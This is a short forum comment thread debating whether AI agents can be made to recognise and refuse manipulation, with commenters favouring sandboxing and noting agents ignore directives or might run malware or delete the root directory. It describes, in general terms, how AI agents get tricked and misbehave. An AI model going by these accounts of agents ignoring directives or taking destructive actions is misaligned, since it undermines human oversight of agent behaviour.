Remix.run Logo
Wowfunhappy 2 days ago

The way to solve it is to make the AI “smart” enough to understand it’s being tricked, and refuse.

Whether this is possible depends almost entirely on how much better we’re able to make these LLMs before (if) we hit a wall. Everyone has a different opinion on this and I absolutely don’t know the answer.

wildzzz a day ago | parent | next [-]

Despite my employer's best efforts to train everyone on cyber security basics, people still do dumb stuff and click on things they shouldn't. It's the reason why my laptop needs to run like 5 different security applications all handling different things. It should be assumed that if a person or agent is technically capable of doing something you've told them not to do, there exists a chance that they're going to do it anyway. Rather than telling the agent "please don't run malware", create barriers that prevent it from impacting anything if it does. We've seen countless examples of agents ignoring prime directives so why would the solution be to give it more prime directives that it may decide to ignore?

Alternatively, you may make an agent too sensitive to trickery that refuses to do anything outside of what it thinks is right. If it somehow thinks that running malware or deleting / is the correct action to take, how can you stop it?

jkubicek a day ago | parent | prev | next [-]

It’s not possible to make the AI smart enough to avoid being tricked. If the AI can run curl it will run curl.

adrianN a day ago | parent | prev [-]

Humans get tricked regularly by phishing emails.